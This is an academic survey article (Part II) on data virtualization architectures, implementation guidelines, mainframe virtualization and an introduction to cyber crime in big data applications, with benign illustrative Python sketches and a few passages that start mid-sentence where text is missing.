Emergent Trends and Challenges in Big Data Analytics, Data Mining, Virtualization and Cyber Crimes: An Integrated Global Perspective- II


33 | International Journal of Computer Systems, ISSN-(2394-1065), Vol. 03, Issue 01, January, 2016


Gurdeep S Hura

Department of Mathematics and Computer Science, University of Maryland Eastern Shore, Princess Anne, MD 21853

gshura@umes.edu

Abstract

In the first part of this paper, we presented the state of the art in big data analytics: how the concept evolved, its applications, available tools, its limitations and its current status, so that researchers and developers can understand how this technology can be used for new applications and for deriving new technologies, tools and frameworks. After introducing the basic concepts of big data analytics, the paper focused on data mining techniques, which were used in the past to offer a systematic approach to system analysis and now find wide use in data representation, data collection and data analysis for multimedia applications. Because data arrives in different forms and formats from different sources, newer data mining techniques are needed for collecting and analyzing huge amounts of multimedia data. We expect such efficient and formal data mining techniques to make big data analytics easier to understand and to simplify formatting, interpreting and extracting useful information from the data collected in these applications. We also presented various unresolved issues and problems in big data analytics and data mining, open challenges, possible future applications and future research initiatives.

I. ABSTRACT (PART II)

Part II of the paper presents the state of the art of the two remaining important technologies, virtualization and data security, as they have been implemented in big data analytics.

Data processing is one of the implementation phases of big data solutions, and many methods can be used for it. Data virtualization offers a simple, user-friendly, visual and dynamic representation of data. It not only represents data in an accessible way but also captures the dynamic behavior of data movement and helps extract useful information from the data. Virtualization tools present the data processing pipeline in a very simple way for data analysis. The paper discusses different architectures of virtualization tools, implementation methodologies, mainframe virtualization, guidelines and various available virtualization abstraction tools that have been used in big data applications.

Business and technology professionals and practitioners are deeply concerned about data security. Data now comes from many sources, such as mobile devices, real-time connectivity and digital business, and this has made it much harder to protect data assets over the Internet. Some security measures have already been implemented in big data analytics, and future big data applications are expected to play an increasingly important role in providing data security. Recent efforts in data analytics have implemented various countermeasures, such as intrusion detection, differential privacy, preventive measures, authentication, digital watermarking and malware countermeasures.

Data security becomes critical when operational strategies must be carried out during a serious crisis. Some organizations and professionals find it difficult to stay competitive without adequate data security and are therefore adding advanced analytics capabilities to manage privacy and security challenges. This approach helps them build a level of trust with their clients, customers and consumers. To reassure customers and consumers about privacy and data security, it is important to establish a framework that not only provides security but also evaluates and meets business needs, big data technology requirements and the needs of customers.

After a brief discussion of the role of data security in big data applications, this paper briefly describes cyber malicious attacks and crimes. It presents the challenges and problems of creating a secure communication environment over the Internet for big data applications, and briefly describes the various attacks and crimes carried out over the Internet, known as cyber attacks and cyber crimes. The paper also surveys the known cyber attacks and cyber crimes that may affect the data processing, data mining techniques and virtualization tools of big data applications running over the Internet. With these attacks and crimes in view, the paper shows how big data implementations address security issues in new applications, and finally presents a cyber security analysis for big data applications.

II. BACKGROUND OF BIG DATA ANALYTICS AND DATA MINING (PART I)


techniques, virtualization frameworks and data security for various applications such as the public sector, manufacturing, retail, healthcare, weather and scientific applications. The paper further described operations in big data, discussed known big data applications, and reviewed the available open source tools that have been used to implement big data applications and various data mining techniques.

After introducing the basic concepts of big data analytics, Part I focused on data mining techniques, which were used in the past to offer a systematic approach to system analysis and now find wide use in data representation, data collection and data analysis for multimedia applications. Because data comes in different forms and formats from different sources, newer data mining techniques for collecting and analyzing huge amounts of multimedia data were introduced. The paper also briefly described suitable data mining techniques and showed how some existing techniques could be redefined for applications such as multimedia data, social networking and scientific weather data. In conclusion, it presented various unresolved issues and problems in big data analytics and data mining, open challenges, possible future applications and future research initiatives.

The following sections present the state of the art of the two remaining important technologies, virtualization and data security, as implemented in big data analytics.

III. DATA VISUALIZATION

A. Basic concepts and definitions of data virtualization

Data visualization is one of the important steps in data analysis; it allows developers to present data to users in a clear and efficient format. Data visualization techniques translate, or map, data and information into visual objects such as lines, bars, points and similar symbols drawn with computer graphics [1-15, 18].
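As a minimal sketch of the mapping described above, assuming plain-text output instead of computer graphics and non-negative values, the Python function below maps (label, value) pairs onto bars whose length is proportional to the value. The function name `to_bars` and the sample data are hypothetical and only illustrate the idea.

```python
def to_bars(data, width=20, symbol="#"):
    """Map each (label, value) pair to a text bar whose length is
    proportional to the value; the largest value gets `width` symbols.
    Assumes non-negative values."""
    if not data:
        return []
    max_value = max(value for _, value in data)
    label_width = max(len(label) for label, _ in data)
    lines = []
    for label, value in data:
        # Scale the value linearly onto the available bar width.
        length = round(value / max_value * width) if max_value > 0 else 0
        lines.append(f"{label.ljust(label_width)} | {symbol * length} {value}")
    return lines


if __name__ == "__main__":
    # Hypothetical sample: record counts per data source.
    sample = [("sensors", 120), ("web logs", 300), ("social", 60)]
    for line in to_bars(sample):
        print(line)
```

The same mapping step (data value to visual attribute, here bar length) is what graphical charting libraries perform before rendering.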

It is one of the steps in data analysis or data science and focuses on conveying ideas effectively, combining aesthetic form with functionality, and providing insight into sparse and complex data sets by communicating their key aspects more intuitively. Developers often fail to balance form and function because they do not design visualizations that actually convey the underlying information.

Data visualization is closely related to information graphics, information visualization, scientific visualization, exploratory data analysis and statistical graphics. Over the last couple of decades, it has become an active area of research, teaching and development for big data sets. It covers presentations of articles, resources, connections, data, news, websites, mind maps, tools, services and other data-related representations. An organization needs to move from vision to implementation, addressing issues such as performance and support for enterprise-wide use of linked data services. The vision must also demonstrate the business value of linked data services by involving executives, other IT teams and business end users early and often in the proof of value.

Managing big data with different characteristics, from internal or external sources, is becoming one of the major challenges for companies. Traditional information management technologies and approaches that provide data integration still play an important role in most of these companies. Data virtualization software offers a viable way to speed up integration, interpret data accurately, derive useful information and improve decision-making in applications that require big data from multiple source systems.

A number of data representation architectures have been used in data virtualization tools. These architectures have been used successfully in a variety of applications and have provided solutions in a useful and easily understandable format. The following section discusses some of these architectures, along with their applications, features and limitations, for representing big data and extracting useful information from it.

B. Data Virtualization Architecture Deployment Options

Data virtualization defines layered architectures for implementing big data representation and data extraction. The layers include the Data Abstraction Layer, the Data Services Layer, the Globally-distributed Data Virtualization Layer and the Logical Data Warehouse. Several virtualization frameworks have found applications in big data analytics. The following section briefly describes Cisco's virtualization framework and its associated query management, which provides optimized queries over user-defined records and attributes. Having identified a virtualization tool and its query management, we then introduce methodologies for implementing big data applications.

(i) Cisco's Data Abstraction Reference Architecture [1-2, 7-8]

This architecture consists of the following layers, which provide a platform for building data abstraction with the data virtualization platform for any data application.

Application Layer – It maps the Business Layer into the format in which each data consumer (user or application) wants to consume the data. For example, it formats the data as XML for Web services, or creates views with alias names that match the way consumers are used to seeing their data.

Business Layer – This layer provides standard or otherwise accepted formats for describing key business attributes such as customers, products, formatted data, financial and other related attributes. These attributes are defined by a set of logical views that the Application Layer reuses for multiple consumers.
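To make the division of work between these two layers concrete, here is a small Python sketch, assuming one hypothetical CRM source whose column names (`cust_no`, `cust_nm`, `rgn_cd`) differ from the business vocabulary. The business layer defines a single logical customer view; the application layer then re-presents that same view with consumer-specific alias names or as XML. None of these names come from Cisco's product; they are illustrative only.

```python
import xml.etree.ElementTree as ET

# Hypothetical physical source: raw rows with source-specific column names.
CRM_ROWS = [
    {"cust_no": 17, "cust_nm": "Acme Corp", "rgn_cd": "EU"},
    {"cust_no": 42, "cust_nm": "Globex", "rgn_cd": "US"},
]


def business_customer_view(rows):
    """Business layer: one logical 'customer' view with standard attribute
    names, independent of how the source names its columns."""
    return [
        {"customer_id": r["cust_no"], "name": r["cust_nm"], "region": r["rgn_cd"]}
        for r in rows
    ]


def application_alias_view(business_rows, aliases):
    """Application layer: rename standard attributes to the alias names a
    particular consumer is used to seeing (unmapped names are kept)."""
    return [{aliases.get(k, k): v for k, v in row.items()} for row in business_rows]


def application_xml_view(business_rows):
    """Application layer: format the same logical view as XML, e.g. for a
    web-service consumer."""
    root = ET.Element("customers")
    for row in business_rows:
        item = ET.SubElement(root, "customer", id=str(row["customer_id"]))
        ET.SubElement(item, "name").text = row["name"]
        ET.SubElement(item, "region").text = row["region"]
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    customers = business_customer_view(CRM_ROWS)
    # One consumer (e.g. a reporting tool) prefers its own column names ...
    print(application_alias_view(customers, {"customer_id": "CustID"}))
    # ... while another consumes the same logical view as XML.
    print(application_xml_view(customers))
```

Because both consumers are served from the one business view, a change in the source column names touches only `business_customer_view`.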


Traditional information architectures have been developed and are widely employed. However, these architectures are not flexible or agile enough to be reconfigured as business strategies change. Data virtualization appears to be a suitable framework for accommodating such changes within the architecture.

(ii) Cisco Data Virtualization's query optimization algorithms and techniques

These techniques provide optimized query features and options that capture the low-level details of business requirements. They are efficient and deliver the needed information faster for business strategies. They have been widely adopted by a number of industries for handling big data sets; for more details, refer to [1-2, 7]. The above architecture supports the following set of modules:

i) The Data Federation module of Cisco Data Virtualization virtually integrates the stored data in memory, providing the complete behavior and environment of the data without the cost and overhead of physical data consolidation.

ii) The Data Discovery module addresses data proliferation and offers a distinctive feature: it automates the identification of data entities and relationships. It also accelerates data modeling so that data analysts can clearly understand how data sets are related and distributed.

iii) The Data Abstraction module converts complex data into a simple form. It is a powerful abstraction tool that maps the underlying structures of complex data to common standard semantics for easy processing and use in applications.

iv) The Data Access, Caching and Delivery module improves data availability, offers flexible standards-based data access, and supports different caching and delivery options for different types of information consumers.

v) The Data Governance module maximizes control and ensures data security, data quality and 7x24 operations.

vi) The Layered Architecture module enables rapid change through a loosely coupled information architecture. This rapid development tool provides the flexibility and agility needed to accommodate changing requirements or business strategies in big data applications.
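The following Python sketch illustrates, under simplified assumptions, three ideas from the module list: federation (joining two independent sources at query time without consolidating them), predicate pushdown (a common federated-query optimization that filters rows inside the source before transfer), and result caching. Predicate pushdown is a general technique named here for illustration, not a description of Cisco's optimizer; the in-memory SQLite table and the dictionary standing in for a remote customer service are hypothetical.

```python
import sqlite3
from functools import lru_cache

# Source 1 (hypothetical): an orders table in its own database.
orders_db = sqlite3.connect(":memory:")
orders_db.execute(
    "CREATE TABLE orders (order_id INTEGER, customer_id INTEGER, amount REAL)"
)
orders_db.executemany(
    "INSERT INTO orders VALUES (?, ?, ?)",
    [(1, 17, 250.0), (2, 42, 80.0), (3, 17, 40.0)],
)

# Source 2 (hypothetical): a customer lookup standing in for a remote service.
CUSTOMER_SERVICE = {17: "Acme Corp", 42: "Globex"}

source_calls = {"orders": 0}  # counts how often the orders source is hit


def fetch_orders(min_amount):
    """Predicate pushdown: the WHERE clause runs inside the source, so only
    matching rows are transferred to the virtualization layer."""
    source_calls["orders"] += 1
    cur = orders_db.execute(
        "SELECT order_id, customer_id, amount FROM orders "
        "WHERE amount >= ? ORDER BY order_id",
        (min_amount,),
    )
    return cur.fetchall()


@lru_cache(maxsize=128)
def federated_order_view(min_amount):
    """Federation: join both sources at query time, without copying either
    into a central store. Results are cached per argument value."""
    return tuple(
        (order_id, CUSTOMER_SERVICE.get(customer_id, "unknown"), amount)
        for order_id, customer_id, amount in fetch_orders(min_amount)
    )


if __name__ == "__main__":
    print(federated_order_view(50.0))
    print(federated_order_view(50.0))  # second call is served from the cache
    print(source_calls)
```

`functools.lru_cache` never expires entries, so this cache would return stale results after the orders source changes; a production cache needs an expiry or invalidation policy.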

C. Data Virtualization Implementation Methodology [1-13, 18]

Having defined the virtualization framework and query management, we now introduce the steps of implementation methodologies for big data applications. A methodology has to ensure customer satisfaction and should be able to incorporate feedback from customers' experiences. In other words, it must offer the following features and capabilities:

• Guidelines for identifying the objectives of big data applications effectively and efficiently
• Options for verification and validation to ensure optimal success in the applications
• Options for securing maximum returns from the methodology
• Flexible support for integration with any system design, development and deployment process
• Various internal and external resources, tools, abstract knowledge levels and easy implementation for predicting outcomes, together with self-sufficiency, easy adoption and reconfigurability

The methodology is based on the software lifecycle concept and includes well-defined processes. Some of the material discussed here is derived from [4, 8, 9, 11, 15].

The implementation methodology consists of the following well-defined, structured processes, each of which is supported by a number of tools and software packages:

• Design and development
• Configuration management
• System architecture and solution architecture
• Strategy and planning management
• Prototype and deployment
• Integrated testing and improvement management

To implement data virtualization, we start with strategy and planning management, where we define and develop a framework that supports the needs and objectives of data virtualization. The implementation requires the following steps:

Step I. First, we identify and define the data virtualization strategies and policies: what data virtualization will offer, its structure, usage patterns, specific project use cases, interfacing and other related opportunities.

Step II. Once we decide to adopt data virtualization, we identify the technical specifications and the data integration decision tools required for its implementation. These tools provide the structure for assessing multiple data virtualization frameworks and their features. Once a framework is chosen, they allow users to organize and prioritize projects by ownership, level of difficulty, advantages, return on investment and other performance measures.
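The prioritization described in Step II can be sketched as a weighted score. The sketch assumes that each candidate project is rated from 1 to 5 on difficulty, expected benefit and return on investment; the weights in `WEIGHTS` and the project names in the usage example are arbitrary, hypothetical values rather than figures from the methodology, and an organization would calibrate its own.

```python
from dataclasses import dataclass


@dataclass
class Opportunity:
    name: str
    owner: str
    difficulty: int  # 1 (easy) .. 5 (hard)
    benefit: int     # 1 (low) .. 5 (high)
    roi: int         # 1 (low) .. 5 (high) expected return on investment


# Illustrative weights only; benefit and ROI count positively,
# difficulty counts against a project.
WEIGHTS = {"benefit": 0.4, "roi": 0.4, "difficulty": 0.2}


def score(op: Opportunity) -> float:
    """Higher is better: reward benefit and ROI, penalize difficulty."""
    return (
        WEIGHTS["benefit"] * op.benefit
        + WEIGHTS["roi"] * op.roi
        - WEIGHTS["difficulty"] * op.difficulty
    )


def prioritize(opportunities):
    """Return the opportunities ordered from highest to lowest score."""
    return sorted(opportunities, key=score, reverse=True)


if __name__ == "__main__":
    pipeline = [
        Opportunity("log archive", "Ops", difficulty=1, benefit=2, roi=2),
        Opportunity("customer 360 view", "Sales IT", difficulty=2, benefit=5, roi=4),
        Opportunity("mainframe reporting", "Finance IT", difficulty=4, benefit=4, roi=3),
    ]
    for op in prioritize(pipeline):
        print(f"{score(op):.1f}  {op.name} (owner: {op.owner})")
```

A linear score keeps the trade-offs transparent to business stakeholders; keeping the owner on each record supports the project-ownership view the step asks for.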


Further, the technical skills and expertise of the team need to be defined: roles and responsibilities, productivity measurement, job descriptions, training that shows IT professionals the capabilities of data virtualization, hands-on development and configuration needs, and a knowledge transfer process, all of which save time, promote efficiency in the long run and improve the return on investment.

Step IV. We need to create multi-faceted training to educate a wide range of IT staff on data virtualization. Initially, IT staff are made aware of its capabilities, and thereafter they receive training targeted at the projects undertaken. Throughout the project, increasing hands-on development with data virtualization experts and partner system integrators helps IT staff gain all the needed skills. The training can be organized as a catalog of sessions, scheduled daily and structured as a set of modules.

Step V. We need to define data governance policies that list all known disallowed activities, together with the activities that may follow from executing them in a ripple effect. When data virtualization is used over the Internet, its security mechanism must implement authentication, authorization, encryption, auditing requirements, transaction logging, configuration, deployment, etc.
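As a minimal sketch of two of the Step V requirements, authorization and auditing, the Python code below checks each request against a role-based policy and records every decision, granted or denied, in an audit trail. It assumes that authentication has already happened upstream; the roles, view names and the `dv.audit` logger name are hypothetical.

```python
import logging
from datetime import datetime, timezone

logging.basicConfig(level=logging.INFO)
audit_log = logging.getLogger("dv.audit")  # hypothetical logger name

# Hypothetical role-based policy: which roles may read which virtual views.
POLICY = {
    "analyst": {"sales_summary"},
    "admin": {"sales_summary", "customer_pii"},
}
AUDIT_TRAIL = []  # in-memory copy of the audit records, for illustration


def authorize(user, role, view):
    """Check an (already authenticated) request against the policy and
    record the decision, whether it is granted or denied."""
    allowed = view in POLICY.get(role, set())
    record = {
        "time": datetime.now(timezone.utc).isoformat(),
        "user": user,
        "role": role,
        "view": view,
        "decision": "GRANT" if allowed else "DENY",
    }
    AUDIT_TRAIL.append(record)
    # A single dict argument lets logging fill the %(name)s placeholders.
    audit_log.info("%(user)s/%(role)s -> %(view)s: %(decision)s", record)
    return allowed


if __name__ == "__main__":
    authorize("alice", "analyst", "sales_summary")
    authorize("alice", "analyst", "customer_pii")
```

Unknown roles fall back to an empty permission set, so the policy denies by default; logging denials as well as grants is what makes the trail useful for later audits.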

Step VI. We also need Composite Professional Services, which provide a well-defined understanding of governance and data virtualization. These services can be used to establish suitable policies for data virtualization that IT staff should follow, because both have to be on the same page to take full advantage of data virtualization and its capabilities and to use it economically, efficiently and effectively. This tool provides the structure needed to assess multiple data virtualization opportunities relative to one another, and we should use it to organize and prioritize the entire data virtualization project pipeline, including project owners, level of difficulty and potential return on investment.

The above is a brief description of virtualization implementation methodologies that have been used in some projects. Since there is no standardized methodology, it is necessary to identify general guidelines for selecting a suitable methodology for a particular big data application.

D. Guidelines for Data Virtualization Implementation [13-15, 18]

We have to establish our data virtualization strategy and usage policies by first understanding what data virtualization has to offer. We also have to learn how data virtualization is used at other organizations, including general usage patterns and specific project use cases.

The following guidelines may be useful in deciding whether a company should adopt data virtualization for its big data applications.

Davis and Eve defined some of these guidelines as best practices for adopting data virtualization in big data applications [5, 13]:

1) Ensure that interested companies or organizations adopt data virtualization quickly to implement an intelligent storage component, and then build toward a bigger concept.

2) Ensure that a common data model offering consistency and high quality is designed and implemented for business users, to build productivity and confidence among potential users.

3) Ensure that governance is established, including how the data virtualization environment is managed as shared infrastructure and services.

4) Ensure that an environment is created for delivering the benefits of data virtualization, including consulting time allocated for business users and the services they need.

5) Ensure that performance tuning and solution scalability testing are done early in the development process. High-performance computing with massively parallel processing may be considered to handle query performance and data analysis on high-volume data.

6) Ensure a phased approach: implement basic data virtualization first, and then gradually introduce its more advanced federation capabilities.

7) Ensure that the company has prepared governance and policies for adopting data virtualization.

8) Ensure that IT staff have basic training and hands-on skills, so that they can implement appropriate recommendations and decisions in big data projects.
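Guideline 5 mentions massively parallel processing for queries on high-volume data. The core idea can be sketched, under simplifying assumptions, as two-phase aggregation: each partition computes partial sums and counts, and a coordinator merges them into the final `AVG(value) ... GROUP BY key` result. The thread pool only stands in for separate nodes; in CPython, threads do not speed up pure-Python computation, so this sketch shows the decomposition rather than a real speed-up. The function names are hypothetical.

```python
from collections import defaultdict
from concurrent.futures import ThreadPoolExecutor


def partial_aggregate(rows):
    """Phase 1 (runs on each partition): per-key running sum and count."""
    acc = defaultdict(lambda: [0.0, 0])
    for key, value in rows:
        acc[key][0] += value
        acc[key][1] += 1
    return dict(acc)


def merge_aggregates(partials):
    """Phase 2 (coordinator): combine partial sums/counts into averages."""
    total = defaultdict(lambda: [0.0, 0])
    for part in partials:
        for key, (s, c) in part.items():
            total[key][0] += s
            total[key][1] += c
    return {key: s / c for key, (s, c) in total.items()}


def parallel_group_avg(rows, partitions=4):
    """AVG(value) GROUP BY key, computed as partitioned two-phase aggregation."""
    # Round-robin partitioning; a real MPP engine would hash-distribute rows.
    chunks = [rows[i::partitions] for i in range(partitions)]
    with ThreadPoolExecutor(max_workers=partitions) as pool:
        partials = list(pool.map(partial_aggregate, chunks))
    return merge_aggregates(partials)


if __name__ == "__main__":
    sales = [("eu", 10.0), ("us", 4.0), ("eu", 20.0), ("us", 6.0), ("apac", 1.0)]
    print(parallel_group_avg(sales, partitions=3))
```

Partitions return sums and counts rather than averages because the average of partial averages is wrong when partitions hold different numbers of rows for a key; comparing the partitioned result with a single-partition run is also a cheap correctness check to include in early scalability tests.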

Following these guidelines should allow users to apply data virtualization tools efficiently, effectively and economically. However, although many organizations and companies show strong interest in using these tools for their big data applications, adoption is held back by a lack of evidence, case studies and documented experience of technical and economic success.

As stated above, recent years have seen great interest and effort in implementing big data analytics and data mining applications in the mainframe environment. In particular, social networking, scientific data in embedded systems, and medical and health applications have become very popular and are encouraging researchers and developers to explore new applications in the mainframe environment. The following section explains how the virtualization methodology has been implemented for mainframe applications.

E. Mainframe Data Virtualization [9-10, 14-15]


are facing is about the use of big data for business intelligence, analytics, cloud computing, mobile computing and related initiatives. IBM's new z Systems mainframes support these technologies with their enormous computing and storage capacity.

The issues in implementing big data on mainframes include data representation, data processing, data replication, use of servers, point-to-point integration connectors, data manipulation and storage. Some integrated data management methods are expensive, struggle with enormous data growth, and fall short of customers' expectations for real-time data.

Some of these big data issues can be reduced by applying data virtualization to data scattered across the enterprise. It allows multiple scattered data sources to be accessed through a single logical interface, which separates the external interface from the internal implementation and provides a high degree of flexibility to change. In data virtualization, data does not move physically: only metadata is used to create a virtual view of the data source(s), providing a faster, more agile way to access and combine data from multiple sources, whether mainframe, distributed, cloud or big data. In typical implementations, the data virtualization solution resides by default on a distributed platform such as Linux, UNIX or Windows (LUW) systems [4].
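The point that data virtualization moves metadata rather than data can be illustrated with a small Python sketch. Assuming two hypothetical sources (a CSV document and a SQLite table with different column names), the `VirtualView` class stores only a mapping from logical to physical columns; rows are pulled from the sources each time the view is read, so a row added at the source after the view is defined is visible immediately.

```python
import csv
import io
import sqlite3

# Hypothetical source 1: a CSV document (e.g. an export from another system).
CSV_SOURCE = "id,name\n1,Ann\n2,Raj\n"

# Hypothetical source 2: a relational table with different column names.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE staff (staff_id INTEGER, full_name TEXT)")
db.execute("INSERT INTO staff VALUES (3, 'Li')")


def read_csv():
    return csv.DictReader(io.StringIO(CSV_SOURCE))


def read_db():
    cur = db.execute("SELECT staff_id, full_name FROM staff ORDER BY staff_id")
    columns = [d[0] for d in cur.description]
    return (dict(zip(columns, row)) for row in cur)


SOURCES = {"csv": read_csv, "db": read_db}

# Metadata only: logical column -> (physical column, type) for each source.
PEOPLE_VIEW = {
    "csv": {"id": ("id", int), "name": ("name", str)},
    "db": {"id": ("staff_id", int), "name": ("full_name", str)},
}


class VirtualView:
    """A single logical interface over scattered sources. Defining the view
    copies no rows; each iteration reads the sources through the metadata."""

    def __init__(self, metadata):
        self.metadata = metadata

    def __iter__(self):
        for source, mapping in self.metadata.items():
            for raw in SOURCES[source]():
                yield {
                    logical: cast(raw[physical])
                    for logical, (physical, cast) in mapping.items()
                }


if __name__ == "__main__":
    print(list(VirtualView(PEOPLE_VIEW)))
```

Consumers see one `id`/`name` schema; the physical column names and formats stay a concern of the metadata alone.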

There are different approaches to transforming the mainframe into a data platform, and Rocket Software takes a different approach from the others. It is based on the Rocket Data Virtualization Server (DVS), an IBM System z data virtualization solution that maintains mainframe connectivity and integration. DVS contains all the components needed for real-time, universal access to data regardless of location or format. By reducing the complexity of mainframe data integration, it eliminates redundant point-to-point integration and improves performance, scalability and manageability. It unlocks the value of mainframe data by transforming non-relational mainframe data into a relational format that can be used by business intelligence and business analytics applications.
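The conversion of non-relational mainframe data into a relational format can be illustrated, in much simplified form, by normalizing hierarchical records with a repeating group into a parent table and a child table. The record layout below is hypothetical, and unlike DVS, which exposes such data as virtual tables without copying it, this sketch loads the rows into an in-memory SQLite database purely to show the shape of the result that BI tools would query.

```python
import sqlite3

# Hypothetical hierarchical records: a parent segment with a repeating
# child group (similar in shape to a COBOL OCCURS clause).
ACCOUNTS = [
    {"acct": "A100", "holder": "Ann",
     "txns": [("2016-01-04", 120.0), ("2016-01-09", -40.0)]},
    {"acct": "B200", "holder": "Raj", "txns": [("2016-01-05", 75.5)]},
]


def to_relational(records):
    """Normalize each record into one parent row and N child rows; the child
    rows carry the parent key plus a sequence number."""
    parents, children = [], []
    for rec in records:
        parents.append((rec["acct"], rec["holder"]))
        for seq, (date, amount) in enumerate(rec["txns"], start=1):
            children.append((rec["acct"], seq, date, amount))
    return parents, children


def load(records):
    """Create the two relational tables and fill them."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE account (acct TEXT PRIMARY KEY, holder TEXT)")
    con.execute(
        "CREATE TABLE txn (acct TEXT REFERENCES account(acct), seq INTEGER, "
        "txn_date TEXT, amount REAL, PRIMARY KEY (acct, seq))"
    )
    parents, children = to_relational(records)
    con.executemany("INSERT INTO account VALUES (?, ?)", parents)
    con.executemany("INSERT INTO txn VALUES (?, ?, ?, ?)", children)
    return con


if __name__ == "__main__":
    con = load(ACCOUNTS)
    # A BI tool can now use ordinary SQL over the former hierarchical data.
    query = (
        "SELECT a.holder, SUM(t.amount) FROM account a "
        "JOIN txn t ON t.acct = a.acct GROUP BY a.holder ORDER BY a.holder"
    )
    print(con.execute(query).fetchall())
```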

Its development environment simplifies data discovery, mapping and the creation of virtual tables; standards-based connectivity ensures secure, reliable integration from any platform or data source; it can access mainframe databases and programs as well as non-mainframe data and application sources; and a high-performance, multi-threaded, z/OS-resident runtime delivers highly scalable, low-cost data virtualization, with up to 99% of its processing running on the mainframe zIIP specialty engine. The mainframe data virtualization solution thus allows users or applications to access any type of data from any data provider, independent of the format or location of the data [4].

The above was a brief discussion of virtualization architectures, frameworks and methodologies for implementing data virtualization in big data applications on different platforms, including the mainframe. These frameworks are powerful and have become the basis for tools that provide data analysis, data extraction, interpretation of data into useful information and many more features. Building on promising results for big data applications, some virtualization abstraction tools have been introduced and tried in applications. The following section describes utility tools that form part of a suite of virtualization tools.

F. Data Virtualization abstraction tools [1, 12-15, 18]

A data virtualization tool can serve as a utility that helps implement data integration processes. In recent years, a number of industries have used it to create platforms for dynamic linked data services, in which each element can be linked, browsed and subscribed to through a unified source even though both the data and the sources may change dynamically. It has also been used to define layered information architectures, such as the data abstraction layer, data services layer, globally distributed data virtualization layer and logical data warehouse, which meet the needs of changing business processes.

Data abstraction plays an important role in bridging the gap between business needs and the original form and format of the source data. Implementing data abstraction on a data virtualization platform provides the following features and benefits:

• Simple information access
• A common business view of the data via an enterprise information model
• More accurate data
• Consistent security rules on data across all data sources and consumers via a unified security framework
• End-to-end control to manage consistency across multiple sources and consumers
• Insulation of business and IT from change: physical data sources can be changed or relocated without impacting information users

Work on developing more utility for abstraction tools is continuing, and a number of new tools are being used in some existing applications.
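Two of the listed benefits, a unified security rule and insulation from change, can be sketched together in Python. The assumptions are a hypothetical catalog that maps a logical name to a reader for its current physical store, and a single e-mail masking rule applied to every result; relocating the data changes only the catalog entry, and consumers calling `query` see the same masked rows before and after.

```python
from typing import Callable, Dict, List

Row = Dict[str, str]

# Two hypothetical physical stores holding the same logical data set.
OLD_WAREHOUSE: List[Row] = [{"name": "Ann", "email": "ann@example.com"}]
NEW_CLOUD_STORE: List[Row] = [{"name": "Ann", "email": "ann@example.com"}]

# Hypothetical catalog: logical name -> reader for the current physical store.
CATALOG: Dict[str, Callable[[], List[Row]]] = {"customers": lambda: OLD_WAREHOUSE}


def mask_email(row: Row) -> Row:
    """Unified security rule: applied identically whatever the source."""
    user, _, domain = row["email"].partition("@")
    return {**row, "email": user[:1] + "***@" + domain}


def query(logical_name: str) -> List[Row]:
    """What consumers call: resolve the logical name, read, apply the rule."""
    return [mask_email(row) for row in CATALOG[logical_name]()]


def relocate(logical_name: str, reader: Callable[[], List[Row]]) -> None:
    """IT moves the physical data; only the catalog entry changes."""
    CATALOG[logical_name] = reader


if __name__ == "__main__":
    before = query("customers")
    relocate("customers", lambda: NEW_CLOUD_STORE)
    print(before == query("customers"))
```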

The above was a brief discussion of various data mining and virtualization techniques that are or could be used in big data analytics. Both play a crucial role in providing big data solutions. Data mining is expected to play an even more vital role, not only in mining big data and representing it in a simple, readable and friendly manner; its predictive analysis techniques and its ability to assess complex data will also enable new analysis techniques for extracting and interpreting data usefully. Virtualization, in turn, helps make data mining-based analysis more accurate and makes the outcome of processed data easy to understand, offering an efficient and effective method of extracting and interpreting data.


Internet should be highly secure, confidential and dependable. The following section introduces a number of cyber malicious attacks and cyber crimes that may affect big data applications, from deriving their solutions to deployment. To understand how malicious attacks work, we first present the attacks and crimes, examine how they affect the normal working of big data analytics and the consequences for our implementations, and then present techniques for preventing them. Finally, we present the cyber crime analysis used by law enforcement agencies in legal investigations.

G. Cyber Crime, Cyber Attack and Crime Analysis [16-21]

As discussed above, big data analytics uses data mining and virtualization to implement big data applications and predict their solutions. Data analytics also supports data security, and some of the applications above show how data analytics has explored intrusion detection, differential privacy, digital watermarking, data integrity, filtering, firewalls and malware countermeasures. To explain the basics of data security, this section briefly introduces the basic components of a computer, data processing algorithms, interconnection with networks and the Internet, and secure communication over the Internet for various applications. It then discusses how a computer or mobile device connected to the Internet can be used as a tool for malicious attacks and cyber crimes, and the countermeasures that can be implemented to protect computing resources. Finally, it summarizes preventive measures that have been used in data analytics in one way or another; new countermeasures are still being investigated and implemented.

A computer can be defined as consisting of five main components: the input unit (which converts data and instructions from human-readable to machine-readable codes); the central processing unit (which controls and coordinates the machine and the data according to its operating instructions, or program, also known as software); software (which is qualitatively different in that it governs how the data are processed); the logic and memory units (which perform calculations, decision-making and storage functions in response to commands from the control unit); and the output unit (which converts processing results back into human-readable language or symbols).

Virtually all of these components are vulnerable to invasion and abuse. Data can be altered at the input stage; operators and system programmers can manipulate data and software; data transmitted over common carrier lines can be tapped; and both authorized and unauthorized users can interfere with computer operations at terminals.
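One common countermeasure for data altered in transit, and for the data integrity measures mentioned earlier, is a message authentication code. The Python sketch below uses the standard `hmac` and `hashlib` modules to tag a record with HMAC-SHA256 and to detect any modification on the way; the shared key is assumed to have been exchanged securely beforehand, and the record format is hypothetical.

```python
import hashlib
import hmac
import secrets

# Assumption: sender and receiver already share this key (exchanged securely).
KEY = secrets.token_bytes(32)


def sign(message: bytes, key: bytes = KEY) -> bytes:
    """Compute an HMAC-SHA256 tag that travels with the message."""
    return hmac.new(key, message, hashlib.sha256).digest()


def verify(message: bytes, tag: bytes, key: bytes = KEY) -> bool:
    """Recompute the tag and compare in constant time."""
    return hmac.compare_digest(sign(message, key), tag)


if __name__ == "__main__":
    record = b"acct=A100;amount=120.00"  # hypothetical record format
    tag = sign(record)
    tampered = b"acct=A100;amount=920.00"  # altered on the line
    print(verify(record, tag), verify(tampered, tag))
```

An HMAC detects tampering but does not stop tapping: the record still travels in clear text, so confidentiality additionally requires encryption, for example TLS.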

The Internet was opened to the public in the early nineties, and since then we have seen a variety of applications such as e-mail, file transfer, remote login, Internet access, browsers, distributed computing and communication (audio, text, pictures, images, attachments, online shopping, online financial transactions, etc.). At the same time, Internet crime has become one of the most serious and challenging issues for network professionals and developers, who must ask how to make the Internet a safe communication environment. A number of investigation processes and supporting tools have been introduced and are used by law enforcement agencies, organizations and government agencies at the Federal, State and County levels. In general, an investigation requires a dedicated team that investigates any Internet crime in its organization using well-defined steps and tools.

IV. DATA PROCESSING IN COMPUTERS

